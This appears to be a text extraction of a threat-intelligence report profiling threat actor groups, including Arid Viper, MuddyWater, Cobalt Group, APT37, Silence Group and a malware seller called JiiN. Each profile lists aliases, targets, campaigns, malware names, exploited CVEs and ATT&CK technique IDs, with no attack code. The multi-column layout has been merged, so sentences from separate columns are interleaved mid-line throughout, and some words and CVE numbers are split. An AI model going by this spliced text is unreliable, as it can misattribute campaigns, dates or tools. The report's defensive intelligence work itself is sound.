PoS intrusion focused on harvesting payment
card information for exfiltration.
2019 Mar-2019
ATK113
targets hotel-
entertainment
industry
2020

PUNCHBUGG dsquery CVE-2016-0167
PUNCHTRACK Net

Targeted
Countries _
North America
Unknown

T1078 - Valid Accounts T1053 - Scheduled Task T1076 - Remote Desktop Protocol
T1192 - Spearphishing Link T1068 - Exploitation for Privilege Escalation T1077 - Windows Admin Shares
T1193 - Spearphishing Attachment T1078 - Valid Accounts T1105 - Remote File Copy
T1047 - W i n d o w s M a n a g e m e n t T1027 - Obfuscated Files or Information T1074 - Data Staged
Instrumentation T1064 - Scripting Command and Control
T1053 - Scheduled Task T1070 - Indicator Removal on Host T1032 - Standard Cryptographic Protocol
T1059 - Command-Line Interface T1078 - Valid Accounts T1043 - Commonly Used Port
T1064 - Scripting T1107 - File Deletion T1105 - Remote File Copy
T1086 - PowerShell T1112 - Modify Registry
T1204 - User Execution Exfiltration
Credential Access
Persistence T1003 - Credential Dumping T1048 - E xfiltration Over Alternative
T1053 - Scheduled Task Discovery Protocol
57
ATK 66 Defense Ideology
Cyber Terrorist
67 ARID VIPER Education
BIG BANG APT Hacktivist
Government Agencies
DESERT FALCONS State Sponsored Media
TAG-CT1
Unknown Military
T
WO-TAILED Language
SCORPION Political Organizations
Arabic
Transportation
DESCRIPTION
APT-C-23 is commonly considered an APT the first attacks were detected in the wild. Arabic speakers from the Middle East.
group linked to the Hamas organization By examining the group’s victims and According to Kaspersky, at its origins,
ruling the Gaza Strip. Reportedly, the its TTPs, it is apparent the group mainly APT-C-23 consisted of 30 members working
group was established in 2011, but attacks targets related to the Palestinian in three teams and operating mainly out
became active starting from 2014, when Authority. APT-C-23 members are native of Palestinian Territories, Egypt and Turkey.
CAMPAIGNS
2015
2015 - Operation Arid Viper Windows systems and two for android 2015
Operation Arid
A targeted campaign against targets in systems. To infect users, the group used Viper 2015
Israel from the government, defense, both spear-phishing and fake news websites Operation
Advtravel an
transportation, critical infrastructure and while exploiting shorten URL services. offset of Arid Viper
campaign
academia sectors. The group mainly used 2016
2018 - GnatSpy Campaign Targets
spear-phishing email with a compressed
the Palestinian Authority
.RAR attachment including a decoy file
and the malware (using Skype icon and A mobile malware campaign distributing
2017
name in some cases). After a successful the GnatSpy strain. 2017 KASPERAGENT/
Micropsia Malware
infection the group had used its access 2018 - Big Bang Campaign A highly Campaign
to steal documents. targeted malware (infostealer)
2015 - Operation Advtravel an offset campaign against the Palestinian 2018
GnatSpy Campaign
of Arid Viper campaign. Authority. 2018
Targets the
Palestinian
Using some of the same infrastructure to 2019 - New Micropsia Campaign; 2018 Authority
Big Bang
attack victims mainly in Egypt A campaign spreading the Micropsia Campaign A highly
targeted malware
2017 - KASPERAGENT/Micropsia malware, first discovered in the group 2019 (infostealer)
2017 attack campaign. In the current campaign against
Malware Campaign the Palestinian
campaign the group used a decoy document Authority. 2019
A malware campaign against targets in allegedly sent from the general security New Micropsia
United States, Israel, Egypt and Palestinian wing of the Hamas, and discusses alleged
Campaign
Territories. The threat actors used four financial deviations spotted among high
2020
different malware, two for Microsoft ranking officers.

Custom tools VAMP bit.ly URL shortening services used to
DHS Spyware FrozenCell disguise the true links they are sending
DHS 2015 GnatSpy in spear phishing emails
iRat WinRAR
Tools used by multiple adversaries
Falcon Trojan None Identified Exploited vulnerabilities
KASPERAGENT CVE-2018-8453
Publicly available tools
MICROPSIA
None Identified
SECUREUPDATE

Targeted
Countries _
Egypt
Israel
Jordan
Kuwait
Palestinian Authority
Qatar
United States
Gaza Strip
Initial Access Defense Evasion Command and Control

T1078 - Valid Accounts T1078 - Valid Accounts T1001 - Data Obfuscation
T1189 - Drive-by Compromise Credential Access T1071 - S tandard Application Layer
T1192 - Spearphishing Link Protocol
T1193 - Spearphishing Attachment T1105 - Remote File Copy
T1194 - Spearphishing via Service Lateral Movement
Exfiltration
Execution T1002 - Data Compressed
T1204 - User Execution Collection T1041 - Exfiltration Over Command and
T1005 - Data from Local System Control Channe
Persistence
T1025 - Data from Removable Media
T1060 - Registry Run Keys / Startup Folder T1056 - Input Capture
T1078 - Valid Accounts T1113 - Screen Capture
Privilege Escalation T1119 - Automated Collection
T1078 - Valid Accounts T1123 - Audio Capture
59
ATK 126 Cyber Criminal End Users & Objectives _
Clement02 Personal-gain
Cyber Terrorist
67 Clem02100
Clement02100 Hacktivist
JiiN State Sponsored
JiiN02100
Unknown
Sparks™
Language
TAG CR9
English
DESCRIPTION
JiiN is a top member of a hacking forum that these regularities in JiiN’s activity for his malware projects, and therefore
we monitor, where he has been active patterns might indicate he works office enjoys a very positive reputation in the
since July 2, 2010. Since that time, he hours and engaging in cybercrime is his underground community. Since 2017,
has created 65 threads and 1,028 posts main occupation. A review conducted the threat actor has advertised three main
under two different pseudonyms (JiiN and on his copious publications revealed products, which are also offered for sale
Clement02). The analysis we performed that JiiN is a fervent gamer, as well as on a popular e-commerce platform in
on JiiN’s activity on the forum shows he is a malware developer. The threat actor the Clearnet: MinerGate Silent Miner,
generally online seven days a week, from has been mainly advertising “crypters” Coak Crypter, and NiiJ Stealer. The three
1:00 to 13:00 UTC/GMT+0 (twelve hours (software used for obfuscating other malware strains are still up for sales to
on average), and he is likely a French malware in order to evade detection) and the time of writing. Moreover, we have
speaker (in an early post, he saluted other cryptocurrency miners since his early stages also retrieved and analyzed an allegedly
French members) but interestingly, refrains in the cybercrime underground. Of note, unknown malware we dubbed Cassandra
from writing posts in French. We assess JiiN regularly receives positive feedback Stealer from a domain under JiiN’s control.

Custom tools No-IP JiiN allegedly uses the No-IP WordPress
MinerGate Silent Miner dynamic DNS provider to makes his
Coak Crypter dynamic IP address act as though
NiiJ Stealer it’s static, enabling his malware
Cassandra Stealer operations.
Beta Bot
Blackshades RAT
NetWire RAT
Absolute Crypter
Infinity Crypter

Targeted
Countries _
France
France
CAMPAIGNS
February 2013 - BlackShades RAT October 2017 - Minergate Silent 2013
Campaign Miner Sales Operation Feb-2013
BlackShades RAT
In a 2013 forum post, JiiN admits spreading On October 25, 2017, JiiN created his campaign 2013
the Blackshades RAT via Torrent, after first malware listing for his self-developed Cryptomining
crypting the malware with several crypters cryptominer, named Minergate Silent campaign
he purchased. The malware is typically Miner, in the market section of a prominent

banded with legitimate software, such as English-language hacking forum. The
FlashPlayer. The threat actor complains malware is coded in .NET 2.0 and works 2014
about the low infection rates gained with the Minergate pool. Ostensibly, more
through this spreading method. than 200 customers bought the malware
in the past two years now, releasing very 2014
Moreover, JiiN was observed spreading RATs NetWire RAT
banded with FlashPlayer via weaponized positive feedbacks, both about the product campaign
Wideo videos(wideo[.]fr). The French and the support provided by JiiN.

video-sharing platform no longer exists. August 2018 - Coak Crypter Sales 2015
It was a YouTube-like platform but used Operation
Flash videos (instead of the actual html5).
On August 26, 2018, JiiN created a listing
In order to spread malware, JiiN created
for his Coak Crypter v2.5, a malware used
fake videos that cannot be viewed without
to make other malware undetectable by AV
installing the Flash Player. When playing the
software and Windows Defender (FUD), in
video, the victims would be redirected to
the market section of a prominent English-
a fake Flash Player (malicious) download, 2016
language hacking forum. In this case, JiiN
hosted on Dropbox.
received mixed feedbacks, nonetheless
2013 - Cryptomining Campaign the product is still up for sales after over
JiiN has affirmed in several occasions one year now.
that he had been using bots (an “army” July 2019 - NiiJ Stealer Sales
of infected computers under his control)
Operation
to mine cryptocurrencies, notably BTC. 2017
Allegedly, he has done so by using the On July 26, 2019, JiiN created a sales
Triplemining pool because of its loose thread for his new infostealer, named NiiJ
oversight for illicit activity. Stealer (V1.5), in the market section of
Oct-2017
a prominent English-language hacking
Of note, infecting computers for cryptomining forum. Of note, JiiN also sells the malware
Minergate Silent
Miner Sales
purposes has apparently been a mainstay on an e-commerce platform broadly used operation
of JiiN’s criminal activity. In this regard, for illicit purposes. We also detected a 2018
he even developed his own cryptominer, proprietary website JiiN uses for advertising
named “Minergate Silent Miner,” put up his malware. NiiJ Stealer is written in .NET,
for sale in October 2017. There is also and its key function is to steal information
evidence that JiiN has been partnering Aug-2018
from three distinct browsers (Firefox, Coak Crypter Sales
with other threat actors for spreading Chrome, Opera), the FileZilla open FTP operation
cryptomining malware. client, and the Pidgin chat client, in addition
2019
2014 - NetWire RAT Campaign to implementing the No-IP dynamic DNS
service. The threat actor offers a lifetime
JiiN was noted using NetWire RAT in
license, which includes the malware builder
mid-2014, even asking for help solving
and the PHP/SQL files related to its control Jul-2019
technical issues he encountered. Of note,
panel (CP), for US$ 35. Based on the NiiJ Stealer Sales
together with cryptomining, RATs spreading operation
results of the AV scanning uploaded by
have been a staple of the threat actor
JiiN in the sales thread, as at August 7, 2020
illicit activity since the beginning of his
2019, NiiJ Stealer was undetected (FUD)
cybercriminal “career.”
by major AV software.
61
ATK 126 Cyber Criminal End Users & Objectives _
Clement02 Personal-gain
Cyber Terrorist
67 Clem02100
Clement02100 Hacktivist
JiiN State Sponsored
JiiN02100
Unknown
Sparks™ Language
TAG CR9
English

Targeted
Countries _
France
France

T1189 - Drive-by Compromise T1003 - Credential Dumping T1032 - Standard Cryptographic Protocol
Execution T1056 - Input Capture T1043 - Commonly Used Port
T1204 - User Execution T1081 - Credentials in Files T1071 - S tandard Application Layer
Lateral Movement Protocol
Persistence T1090 - Connection Proxy
T1060 - Registry Run Keys / Startup Folder T1105 - Remote File Copy
Privilege Escalation Collection
Exfiltration
T1050 - New Service T1005 - Data from Local System
T1020 - Automated Exfiltration
T1055 - Process Injection T1039 - Data from Network Shared Drive
Defense Evasion T1074 - Data Staged
T1041 - Exfiltration Over Command and
T1093 - Process Hollowing Control Channel
T1140 - Deobfuscate/Decode Files or T1119 - Automated Collection
Information
63
ATK51 Cyber Criminal Defence & Objectives _
MUDDYWATER Education Espionage
MOBHAM Cyber Terrorist
66 Energy
NTSTATS Hacktivist Financial Services
POWERSTATS
State Sponsored Government Agencies
SEEDWORM
STATIC KITTEN Healthcare
Unknown
TEMP.ZAGROS High-Tech Language
I nternational Unknown
Organizations
Media
DESCRIPTION
AATK51 attacks are primarily against India and the USA. MuddyWater attacks broad scrutiny and reports on MuddyWater
Middle Eastern nations. However, we have are characterized by the use of a slowly attacks, the activity continues with only
also observed attacks against surrounding evolving PowerShell-based first stage incremental changes to the tools and
nations and beyond, including targets in backdoor we call “POWERSTATS”. Despite techniques.
CAMPAIGNS
MuddyWater targets Middle East, Victims also include Middle Eastern analysis of another campaign that bore the
USA and India universities and Middle Eastern embassies hallmarks of MuddyWater. Instead of using
The attackers behind MuddyWater have based in Europe. government or telecommunication-related
been active throughout 2017, with targets Finally, two large NGOs were compromised documents, the new lure is presented as a
across the Middle East and surrounding as well as victims working for global public reward or promotion, which could indicate
areas. The countries targeted were Saudi health organizations. that the targets are no longer limited to
Arabia, Iraq, Israel, United Arab Emirates, specific industries or organizations.
Georgia, India, Pakistan, MuddyWater Operations in Lebanon
and Oman 2017
Turkey and the USA. Feb-2017
At the end of 2018 ATK51 targeted victims, MuddyWater
ATK51: Seedworm’s Powermud probably from Lebanon and Oman, while targets Middle East
- USA and India
backdoor campaign exploiting compromised domains, one of
The Seedworm campaign (ATK51) took which belongs to an Israeli web developer. May-2017
place between the end of September Depending on each sample, the content of After MuddyWater
- ATK51 led a
2018 and mid-November of the same the document is either a false curriculum new and broader
campaign in early
year. In all, 131 victims were infected vitae or a letter from the Ministry of Justice 2018
with Powermud Backdoor according to in Lebanon or Saudi Arabia.
Symantec. They were mainly in Pakistan ATK51 updates its TTP in Spear
and Turkey. There are also organizations
Phishing Campaign to target Asia
that have been victims of this Backdoor in
and Middle East 2018 Feb-2017
Russia, Saudi Arabia, Afghanistan, Jordan ATK51 updates
and other countries. From January 2018 to March 2018, its TTP in Spear
Phishing Campaign
FireEye observed ATK51 (MuddyWater) to target Asia and
European and North American organizations leveraging the latest code execution Middle East
have also been compromised. Their and persistence techniques to distribute
common denominator being their link malicious macro-based documents to
with the Middle East. individuals in Asia and the Middle East.
Among the sectors affected are From January 23 to February 26, 2018: Sep-2018 Sep-2018
telecommunications and IT services. Turkey, Pakistan, Tajikistan. ATK51: MuddyWater
There are also victims in the oil and gas Seedworm's
Powermud
Operations in
Lebanon and
sector, more specifically companies linked From February 27 to March 5, 2018: backdoor campaign Oman
to a large Russian group operating in India, Pakistan, Turkey.

the Middle East. The other victims of the After MuddyWater, ATK51 led a new 2019
energy sector are in North America, the and broader campaign in early 2018
Middle East, Africa and Asia.
In March 2018, Trend Micro provided an

MuddyC3 LaZagne None
POWERSTATS Mimikatz

Austria Middle East
Azerbaijan North America
Bahrain Pakistan
Asia Russia
Eastern Europe Saudi Arabia
Georgia Southern Asia
India Turkey
Iran United States
Israel United Arab
Iraq Emirates
Jordan Western
Mali Europe
Iran

T1193 - Spearphishing Attachment T1027 - Obfuscated Files or Information T1105 - Remote File Copy
Execution T1036 - Masquerading T1175 - Distributed Component Object
T1064 - Scripting Model
Instrumentation T1088 - Bypass User Account Control Collection
T1059 - Command-Line Interface T1085 - Rundll32 T1113 - Screen Capture
T1064 - Scripting T1140 - Deobfuscate/Decode Files or
T1085 - Rundll32
T1090 - Connection Proxy
T1086 - PowerShell
T1170 - Mshta
T1191 - CMSTP T1104 - Multi-Stage Channels
T1170 - Mshta
T1173 - Dynamic Data Exchange
T1500 - Compile After Delivery
T1191 - CMSTP Credential Access Exfiltration
T1204 - User Execution T1003 - Credential Dumping T1002 - Data Compressed
Persistence T1081 - Credentials in Files
T1060 - Registry Run Keys / Startup Folder Discovery
Privilege Escalation T1016 - System Network Configuration
Discovery
T1033 - System Owner/User Discovery
65
ATK 67 Cyber Criminal Financial Services & Objectives _
COBALT GROUP High-Tech Personal-gain
Cyber Terrorist
66 COBALT GANG Media
COBALT SPIDER Hacktivist
Retail
GOLD KINGSWOOD State Sponsored
TAG-CR3
Unknown
Language
Russian
DESCRIPTION
Cobalt group is considered to be a highly first spotted in 2016 in an attack against tools developed in house. Furthermore,
advanced financial actor. The group targets a bank in Russia and while the group part of the group tactics is to attack the
come mostly from the financial sector with leader was arrested in Spain the group supply chain of its targets.
a strong focus on banks and ATM services is still considered to be active. The group
in Eastern Europe and Asia. Cobalt was uses a variety of attack tools including
CAMPAIGNS
Jun - August 2016 - Attacks Against 2018 - Spear Phishing Campaigns 2016
Banks ATMs Continues

Between June and August 2016, the group Inspite the arrest of the group leader in
carried out several attacks against banks March of 2018, attacks by the group
networks in order to get access and steal continued all around 2018. The attacks Jun-Aug-2016
money from the institution’s ATM machines use mostly the same TTPs, spear phishing Attacks Against
Banks ATMs
that leads to an exploit which end with
2017 - Spear Phishing Campaigns the download and execution of malware
Throughout 2017, Cobalt Group has in several cases Cobalt group has used 2017
distributed large amount of spear phishing dedicated in house developed tools and
campaigns. The targets of the campaigns also the exploit kit ThreadKit in order to
were various financial institutions and their spread does tools. Regarding its targets the 2017
supply chain. The campaigns combined group continued to focus on the financial Spear Phishing
Campaigns
some sort of social engineering and different sector mostly in Eastern Europe.
known exploits mostly for Microsoft Word.
However, in some cases malicious macro
was used instead of exploits. A successful
infection ends with the installation and 2018
2018
execution of different tools and malware Spear Phishing
Campaigns
such as Cobalt Strike, AmmyyRAT, Metasploit Continues
And more

Custom tools Publicly available tools PsExec CVE-2017-8759
More_eggs Cobalt Strike SDelete CVE-2017-11882
ATMSpitter Mimikatz S
oftPerfect Network CVE-2012-0158
ATMRipper Metasploit Scanner CVE-2017-0199
CobInt AlexusMailer PowerShell CVE-2018-0802
Cyst Downloader CMSTP CVE-2015-1641
SpicyOmelette Regsvr32 CVE-2017-8570
odbcconf CVE-2017-0262
Tools used by multiple
adversaries TeamViewer
AmmyyRAT Ammyy Admin
Microsoft Word Intruder msxsl
ThreadKit builder

Argentina Italy Taiwan
Armenia Jordan Tajikistan
Austria Kazakhstan Thailand
Azerbaijan Kuwait Turkey
Belarus Kyrgyzstan United
Bulgaria Malaysia Kingdom
Canada Moldova United
China Netherlands States
Czech Poland Ukraine
Republic Romania Vietnam
Estonia Russia
Georgia Spain
Spain Ukraine
Initial Access Privilege Escalation Discovery

T1192 - Spearphishing Link T1050 - New Service T1046 - Network Service Scanning
T1193 - Spearphishing Attachment T1053 - Scheduled Task T1063 - Security Software Discovery
Execution T1055 - Process Injection Lateral Movement
T1053 - Scheduled Task T1068 - Exploitation for Privilege Escalation T1037 - Logon Scripts
T1059 - Command-Line Interface T1088 - Bypass User Account Control T1076 - Remote Desktop Protocol
T1064 - Scripting Defense Evasion T1105 - Remote File Copy
T1086 - PowerShell T1027 - Obfuscated Files or Information Command and Control
T1117 - Regsvr32 T1055 - Process Injection T1032 - Standard Cryptographic Protocol
T1173 - Dynamic Data Exchange T1064 - Scripting T1071 - S tandard Application Layer
T1191 - CMSTP T1088 - Bypass User Account Control Protocol
T1203 - Exploitation for Client Execution T1107 - File Deletion T1105 - Remote File Copy
T1204 - User Execution T1108 - Redundant Access T1219 - Remote Access Tools
T1218 - Signed Binary Proxy Execution T1117 - Regsvr32
T1220 - XSL Script Processing T1191 - CMSTP
Persistence T1218 - Signed Binary Proxy Execution
T1050 - New Service T1220 - XSL Script Processing
T1037 - Logon Scripts
T1108 - Redundant Access
67
ATK4 Chemical Espionage
Cyber Terrorist
66 GROUP 123 Healthcare
OPERATION DAYBREAK Hacktivist
High-Tech
OPERATION EREBUS State Sponsored Manufacturing
REAPER
Unknown Transportation
RED EYES
Language
RICOCHET CHOLLIMA
Korean
SCARCRUFT
DESCRIPTION
APT37 (aka Group 123, Reaper, Scarcruft) primarily the South Korean government, group can incorporate recently disclosed
North Korean is a cyber espionage group military, defense industrial base, and media vulnerabilities in their toolset. It can
active since at least 2012. This group sector, APT37 switch to more international be explained with the collaboration of
targets the public and private sector mostly targets with new attacks against the Middle different Unit within the North Korean
in South Korea. FireEye judge that the East, Japan and Vietnam. These new targets Reconnaissance General Bureau.
primary mission is to covert intelligence are all related to North Korean interests. APT37 uses a C2 infrastructure composed
gathering in support of North Korea's This group use spear phishing, Strategic of compromised servers, messaging
strategic military, political and economic Web Compromises or torrent file-sharing platform, cloud services and social medias
interest. This threat actor is skilled and as initial infection vector. From 2014 to to communicate or deploy its malwares
resourceful. 2017 their lure documents were written in and avoid detection. The small websites
By its focus on South Korean targets this Korean and were related to theme relative that were leverage were probably victims
group can be compared to the Unit 91 to the Korean peninsula. It uses various of opportunistic attacks.
who has similar objectives. legitimate platform as C2 and has access
While from 2014 to 2017, APT37 targeted to multiple 0-days vulnerabilities. The

CORALDECK None CVE-2017-0199 CVE-2016-4117
DOGCALL CVE-2013-0808 CVE-2015-5122
HAPPYWORK CVE-2015-5119 CVE-2015-7645
GELCAPSULE CVE-2018-4878 CVE-2015-2545
KARAE CVE-2015-3105 CVE-2015-2387
MILKDROP CVE-2015-2419 CVE-2013-4979
POORAIM CVE-2016-1019 CVE-2018-0802
RICECURRY CVE-2014-8439
RUHAPPY
SHUTTERSPEED
SOUNDWAVE
SLOWDRIFT
WINERACK
ZUMKONG

Targeted
Countries _
Hong Kong
Japan
Middle East
South Korea
Vietnam
North Korea
CAMPAIGNS
August 2016 - March 2017 - Golden November 2017 - North Korean 2016
Time campaign Human Rights campaign

APT37 uses spear-phishing about “Korean APT37 used lure documents related to a
Reunification and North Korean Conference” meeting held on 1st November in Seoul,
using a compromise email account from the South Korea. This document is written in
Yonsei University network. The documents Korean and contains a new version of
leveraged the CVE-2013-0808 used to DOGCALL/ROKRAT.
download DOGCALL/ROKRAT.
January 2018 - Evil New Year 2018
November 2016 - January 2017 campaign Aug-2016
Golden Time
- Evil New Year campaign This is a spear-phishing campaign using campaign
APT37 targets South Korea using spear- a lure document about an analysis of
phishing emails allegedly sent by Korean the 2018 New Year speech made by the
Ministry of Unification. The useage of leader of North Korea alleged to have been Nov-2016
Hancom Hangul malicious documents written by the Ministry of Reunification. This Evil New Year
campaign
reduce the risk of being detect by security is the same method used one year earlier. 2017
tools. The lure documents were about New
Year's activities of North Korea. These September 2018 - ScarCruft target
documents dropped binaries which tries to a Russian organization related to
connect to the Korean Government Legal North Korean affairs May-2017
Services (KGLS) compromised website. On September 21, 2018 ScarCruft attack APT37 targets a
Middle Eastern
During this campaign, the reconnaissance a Russian victim who was compromised by company (Freemilk
phase was separated from the DOGCALL/ the APT group called DarkHotel in March campaign)
ROKRAT payload. 2018. The fact that this victim visits North
Korea makes its special and suggests that
May 2017 - APT37 targets a Middle it may have valuable information about
Easterncompany (Freemilkcampaign) North Korean affairs. APT37 and DarkHotel
In May 2017, APT37 used spear phishing are both Korean speaker but seems to be
lure against a board member of a Middle in conflict. There are some overlap in their Nov-2017
Eastern financial company exploiting CVE- victimology, but they use different TTP and North Korean
Humain Rights
2017-0199 which was disclosed recently. tools. It is not impossible that one of these Jan-2018 campaign
2018
The targeted company was involved in North group is regularly watching the other. Evil New Year
2018 campaign
Korean affairs and was attacked quickly
after media reported on the termination
of their collaboration. APT37 used the
malware SHUTTERSPEED/Freenki.
Sep-2018
ScarCruft targets
a Russian
organization
related to North
Korean affairs
2019
69
ATK4 Chemical Espionage
Cyber Terrorist
66 GROUP 123 Healthcare
OPERATION DAYBREAK Hacktivist
High-Tech
OPERATION EREBUS State Sponsored Manufacturing
REAPER
Unknown Transportation
RED EYES Language
RICOCHET CHOLLIMA
Korean
SCARCRUFT

Targeted
Countries _
Hong Kong
Japan
Middle East
South Korea
Vietnam
North Korea

T1192 - Spearphishing Link T1102 - Web Service T1123 - Audio Capture
T1189 - Drive-by Compromise T1045 - Software Packing T1005 - Data from Local System
T1193 - Spearphishing Attachment T1088 - Bypass User Account Control Command and Control
Execution T1055 - Process Injection T1071 - Standard Application Layer
T1106 - Execution through API T1064 - Scripting Protocol
T1059 - Command-Line Interface T1027 - Obfuscated Files or Information T1105 - Remote File Copy
T1203 - Exploitation for Client Execution T1116 - Code Signing T1102 - Web Service
T1173 - Dynamic Data Exchange Credential Access T1043 - Commonly Used Port
T1064 - Scripting T1003 - Credential Dumping T1094 - Custom Command and Control
T1204 - User Execution Protocol
Discovery
Persistence T1057 - Process Discovery Impact
T1060 - Registry Run Keys / Startup Folder T1033 - System Owner/User Discovery T1487 - Disk Structure Wipe
Privilege Escalation T1082 - System Information Discovery
T1088 - Bypass User Account Control T1120 - Peripheral Device Discovery
T1055 - Process Injection Lateral Movement
71
SILENT GROUP Government Agencies Organizational gain
Cyber Terrorist
65 TAG-CR8
Hacktivist
State Sponsored
Unknown
Language
Russian, English
DESCRIPTION
Silence Group is a Cybercrime group that group has shifted to attack banks all over downloading additional tolls, track victims
has been active since the end of 2016 the world such as in East Asia, Europe and more. A few versions of the toll were
and has attacked mostly banks all over the and more. The group is known for their found, and it has shown that the group is
world. The group is believed to be from sophisticated and profound attacks, in continuing to enhance them. Furthermore,
a Russia, because most of their attacks which usually they take a long period the group uses malwares to attack ATMs
(at least at the beginning), were directed of time to study the potential victim, to specifically, such as Atmosphere. Through
against banks from Russia and former maximize the attack against them. In this, the group was able to steal millions
Soviet Union counties. Furthermore, they most cases, Spear-phishing emails were of dollars in cash along the years, mostly
used very high level of Russian in their sent to bank employees, while having from banks in Russia, and Eastern Europe.
phishing emails, and it was found that a malicious file attached to them. This Overall, the group continues to be highly
some of the commands of their tools were usually downloaded the Silence Trojan active, and new campaigns were uncovered
in Russian. However, along the years, the that has many capabilities of stealing data, just in the past few months.

Custom tools Tools used by multiple adversaries RAdmin
S ilanced Downloader (TrueBot, P erl IrcBot
MainModule) Exploited vulnerabilities
S moke Bot
S urveillanceModule VE-2017-11882
C
Publicly available tools VE-2017-0199
C
K ikothac
eterpreter
M VE-2018-0802
C
A tmosphere
F arse VE-2018-8174
C
I voke VE-2017-0262
C
E DA
x fs-disp.exe

Armenia Hong Kong Switzerland
Austria Israel Taiwan
Azerbaijan Kazakhstan Turkey
Bangladesh Kenya Ukraine
Belarus Kyrgyzstan U
nited
Cyprus Latvia Kingdom
Czech Malaysia Uzbekistan
Republic Poland Vietnam
Georgia Romania
Germany Russia
Greece Serbia
Russia (or former Soviet Union countries)
CAMPAIGNS
July-August 2016 - Silence targets January 2018 - February 2018 - cyber-security defenses. The campaign was
the Automated Workstation Client Attacks against financial institutions launched against south Asian countries
of the Russian Central Bank Financial institutions in the UK, India and (Taiwan, Malaysia, and South Korea),
The group gained access to the Automated Russia were attacked, and funds were stolen former Soviet Union countries (Kyrgyzstan,
Workstation Client of the Russian Central from most of them. The attack in most Kazakhstan, and Ukraine) and European
Bank (AWS CBR), which enables to transfer cases used malicious word documents. (mostly British). In most cases, the victims
funds between Russian banks. The station that received the phishing emails were
February - April 2018 - Attacks banks employees.
was located in part of a Russian bank, and
through there the group tried to steel funds. against Russian and Eastern European
banks June 2019 - July 2019 - Silence
However, the attack was thwarted by the targets banks using the EDA trojan
bank itself because of improper preparation As part of two attacks against Russian
and Eastern European banks, hundreds The group attacked banks in Russia Chile,
of the payment order. A month later, the
of thousands of dollars were stolen. In the Bulgaria, Costa Rica and Ghana. In some
group gained access to a server of the
first case, more than half a million dollars of these attacks the EDA Trojan was used.
same bank, and this time downloaded a
software that takes screen-shoots, which we stolen through card processing. The March 2019 - May 2019 - ATM
were sent to the attackers. Also, in this second one they stole about 150,000 attacks
case the attack was stopped before any dollars after they used their own tool on
At the end of May 2019, a few individuals
valuable information was stolen. ATMs to steal the funds.
stole large amounts of money from an
September 2017 - Silence targets May 2018 - October 2018 - Spear- AMT of Bangladeshi bank Dutch-Bangla
banks phishing campaigns against banks in a few separate days. Two possibilities
in Russia were raised how it is possible: by using
Targeted attack was launched against
2018 Emails with malicious Word the Atmosphere Trojan that was previously
banks in Russia, Malaysia and Armenia.
attachments. Emails were sent to banks deployed on the attacked devices or
In this case the group gained access to
in Russia, which included the CVE-2017- through card processing mechanism. Of
the internal networks of the banks, and
11882 vulnerability to install the Silence note, two other Bangladeshi banks (NCC
then studied their day to day work. This
Trojan. The first attack was against Russian Bank and Prime Bank) were also attacked
stage was in order to create a very focused
banks, and the second was against a at the same time, but they were able to
attack, which will make it more successful.
bank in India. thwart the attack against eventually.
The group has also used spear phishing
emails with malicious attachments to
October 2018 - January 2019 - June 2019 - July 2019 - Attack of
compromise the victims.
Reconnaissance campaigns against the Russian IT bank
October 2017 - Silence Group banks At the beginning emails with a malicious
attacked ATMs attachment that looked like invitations to the
The group launched a three reconnaissance
International Financial Forum iFin-2019,
Silence Group attacked ATMs and stole campaigns against banks in different
were sent to employees of the Russian IT
hundreds of thousands of dollars from a areas. As part of the campaigns, tens of
bank. The email contained a ZIP archive
Russian bank, alongside DDoS attacks thousands of emails were sent to different
attachment that deployed the latest version
against them using IRC channels to control targets with a picture or a link, but without
of the Silence malware.
the Trojans. Of note, even though they had a malicious payload. The purpose of this
access again to the (AWS CBR) system, they campaign was to update their email list
did not try to exploit this system this time. (with the active emails), and to see their
2016 2017 2018 2019 2020
Jul-Aug-2016 Sep-2017 Jan-Feb-2018 May-Oct-2018 Mar-2019 Jun-2019

Silence targets Silence targets Attacks against Spear-phishing ATM attacks • Silence targets
the Automated bank financial campaigns against banks using the
Workstation Client institutions banks in Russia EDA trojan
of the Russian
• Attack of the
Central Bank Oct-2017 Feb-Apr-2018 Oct-2018 Russian IT bank
Silence Group
Attacks against Reconnaissance
attacked ATMs
Russian and campaigns against
Eastern European banks
banks
73
SILENT GROUP Government Agencies Organizational gain
Cyber Terrorist
65 TAG-CR8
Hacktivist
State Sponsored
Unknown
Language
Russian, English

Armenia Hong Kong Switzerland
Austria Israel Taiwan
Azerbaijan Kazakhstan Turkey
Bangladesh Kenya Ukraine
Belarus Kyrgyzstan U
nited
Cyprus Latvia Kingdom
Czech Malaysia Uzbekistan
Republic Poland Vietnam
Georgia Romania
Germany Russia
Greece Serbia
Russia (or former Soviet Union countries)
Initial Access Privilege Escalation Collection

T1193 - Spearphishing Attachment T1053 - Scheduled Task T1113 - Screen Capture
Execution T1134 - Access Token Manipulation T1125 - Video Capture
T1035 - Service Execution Defense Evasion Command and Control
T1053 - Scheduled Task T1027 - Obfuscated Files or Information T1043 - Commonly Used Port
T1059 - Command-Line Interface T1064 - Scripting T1071 - S tandard Application Layer
T1064 - Scripting T1107 - File Deletion Protocol
T1086 - PowerShell T1134 - Access Token Manipulation T1079 - Multilayer Encryption
T1106 - Execution through API T1140 - Deobfuscate/Decode Files or T1105 - Remote File Copy
T1170 - Mshta Information T1132 - Data Encoding
T1203 - Exploitation for Client Execution T1170 - Mshta T1219 - Remote Access Tools
T1204 - User Execution T1223 - Compiled HTML File Exfiltration
T1223 - Compiled HTML File Discovery T1022 - Data Encrypted
Persistence T1082 - System Information Discovery
Impact
T1053 - Scheduled Task Lateral Movement T1489 - Service Stop
T1060 - Registry Run Keys / Startup Folder T1105 - Remote File Copy
75
APT33 Cyber Criminal Aerospace & Objectives _
Aviation
ATK35 Chemicals Espionage
Cyber Terrorist
64 CHARMING KITTEN Communication
Hacktivist Defence
ELFIN Dissident
GROUP 83 State Sponsored Education
Energy
IKITTENS Financial Services
Unknown Government Agencies
MAGNALLIUM
Healthcare Language
NEWSBEEF High-Tech
Manufacturing Unknown
NEWSCASTER
Media
PARASTOO Research
DESCRIPTION
ATK35 is an Iranian cyberespionage group KITTEN reveals this adversary engages in that may not distinguish between the two
operating since approximately 2013. This a level of preparation and patience not groups' activities.
adversary targets organizations involved in often seen with targeted intrusion efforts. ClearSky expose a connection between
government, defense technology, military, This actor will also target third-party Charming Kitten and Behzad Mesri, an
and diplomacy sectors. This adversary has service providers in order to compromise Iranian national indicted for his involvement
been known to leverage fraudulent social organizations of interest. ATK35 usually in hacking HBO.
network profiles to target individuals and tries to access private email and Facebook
By pivoting off the malicious infrastructure
organizations of interest through credential accounts, and sometimes establishes
ClearSky found a sample of MAGICHOUND.
collection and malware infection via an a foothold on victim computers as a
RETRIEVER, a malware which is covered
